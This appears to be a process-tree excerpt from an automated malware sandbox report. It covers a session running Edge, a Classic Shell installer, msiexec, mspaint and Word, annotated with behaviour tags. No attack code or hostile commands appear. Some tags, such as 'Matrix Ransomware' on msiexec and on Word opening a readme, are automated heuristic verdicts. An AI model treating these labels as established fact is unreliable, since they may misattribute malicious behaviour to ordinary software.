C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4548 /prefetch:12⤵PID:2188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:12⤵PID:1172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5868 /prefetch:12⤵PID:2588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:12⤵PID:4444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:12⤵PID:3648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6584 /prefetch:82⤵PID:5532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6256 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4324 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:3296
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7164 /prefetch:12⤵PID:2844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5852 /prefetch:12⤵PID:3784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:12⤵PID:4092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:12⤵PID:5796
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6128 /prefetch:12⤵PID:5300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2212 /prefetch:12⤵PID:5228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6980 /prefetch:12⤵PID:5872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7196 /prefetch:12⤵PID:1096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1808 /prefetch:12⤵PID:3636
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7192 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7516 /prefetch:12⤵PID:2820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7188 /prefetch:12⤵PID:5504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7828 /prefetch:12⤵PID:1492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7632 /prefetch:12⤵PID:5828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7860 /prefetch:82⤵PID:2516
-
-
C:\Users\Admin\Downloads\ClassicShellSetup_4_3_1.exe"C:\Users\Admin\Downloads\ClassicShellSetup_4_3_1.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2080 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\ProgramData\ClassicShellSetup64_4_3_1.msi"3⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2304
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:12⤵PID:5452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7396 /prefetch:12⤵PID:2864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=7884 /prefetch:82⤵PID:1720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4548 /prefetch:12⤵PID:2856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=7820 /prefetch:82⤵PID:1700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4180 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:12⤵PID:1148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1932 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5604
-
-
C:\Windows\system32\mspaint.exe"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\OIP.jpg"2⤵
- Sets desktop wallpaper using registry
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3016
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1124
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5560
-
C:\Users\Admin\Desktop\RetroBar.exe"C:\Users\Admin\Desktop\RetroBar.exe"1⤵
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3320
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Matrix Ransomware
- Adds Run key to start application
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4328 -
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:42⤵
- Suspicious use of AdjustPrivilegeToken
PID:4324
-
-
C:\Windows\syswow64\MsiExec.exe"C:\Windows\syswow64\MsiExec.exe" /Y "C:\Windows\SysWOW64\StartMenuHelper32.dll"2⤵
- Loads dropped DLL
- Modifies system executable filetype association
- System Location Discovery: System Language Discovery
PID:3608
-
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Windows\system32\StartMenuHelper64.dll"2⤵
- Loads dropped DLL
- Modifies system executable filetype association
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4912
-
-
C:\Program Files\Classic Shell\ClassicStartMenu.exe"C:\Program Files\Classic Shell\ClassicStartMenu.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:1080
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding AD55C06BF5935D0F8EEBB924AB3D8BA2 C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3804 -
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Program Files\Classic Shell\ClassicShellReadme.rtf" /o ""3⤵
- Matrix Ransomware
- Drops file in Program Files directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1712
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:6096
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x500 0x4501⤵PID:2052
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵
- System Location Discovery: System Language Discovery
PID:2696
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService1⤵PID:3528
-
C:\Program Files\Classic Shell\ClassicStartMenu.exe"C:\Program Files\Classic Shell\ClassicStartMenu.exe" -settings1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5692
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵
- System Location Discovery: System Language Discovery
PID:1100
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵
- System Location Discovery: System Language Discovery
PID:1424
-
C:\Program Files\Classic Shell\ClassicStartMenu.exe"C:\Program Files\Classic Shell\ClassicStartMenu.exe" -settings1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2504
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵
- System Location Discovery: System Language Discovery
PID:4844
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Windows\System32\shell32.dll,Control_RunDLL C:\Windows\System32\main.cpl,@11⤵PID:5196
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵
- System Location Discovery: System Language Discovery
PID:6000
-
C:\Windows\System32\mspaint.exe"C:\Windows\System32\mspaint.exe"1⤵
- Sets desktop wallpaper using registry
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1484
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService1⤵PID:5588
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵
- System Location Discovery: System Language Discovery
PID:5260
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵
- System Location Discovery: System Language Discovery
PID:1416
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
PID:5888
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:2328 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffe84b646f8,0x7ffe84b64708,0x7ffe84b647182⤵PID:4724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,17417735289199992089,13969044616882732182,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2232 /prefetch:22⤵PID:4208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,17417735289199992089,13969044616882732182,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,17417735289199992089,13969044616882732182,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3008 /prefetch:82⤵PID:3164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,17417735289199992089,13969044616882732182,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:12⤵PID:884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,17417735289199992089,13969044616882732182,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:12⤵PID:1452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,17417735289199992089,13969044616882732182,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4076 /prefetch:12⤵PID:4648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,17417735289199992089,13969044616882732182,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:12⤵PID:4160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,17417735289199992089,13969044616882732182,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3512 /prefetch:82⤵PID:1504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,17417735289199992089,13969044616882732182,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3512 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,17417735289199992089,13969044616882732182,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:12⤵PID:3988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,17417735289199992089,13969044616882732182,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:12⤵PID:1236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,17417735289199992089,13969044616882732182,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4420 /prefetch:12⤵PID:2308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,17417735289199992089,13969044616882732182,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1252 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:4852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,17417735289199992089,13969044616882732182,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:12⤵PID:5468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,17417735289199992089,13969044616882732182,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5816 /prefetch:12⤵PID:4308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,17417735289199992089,13969044616882732182,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:12⤵PID:3272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,17417735289199992089,13969044616882732182,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:12⤵PID:3800
-
-
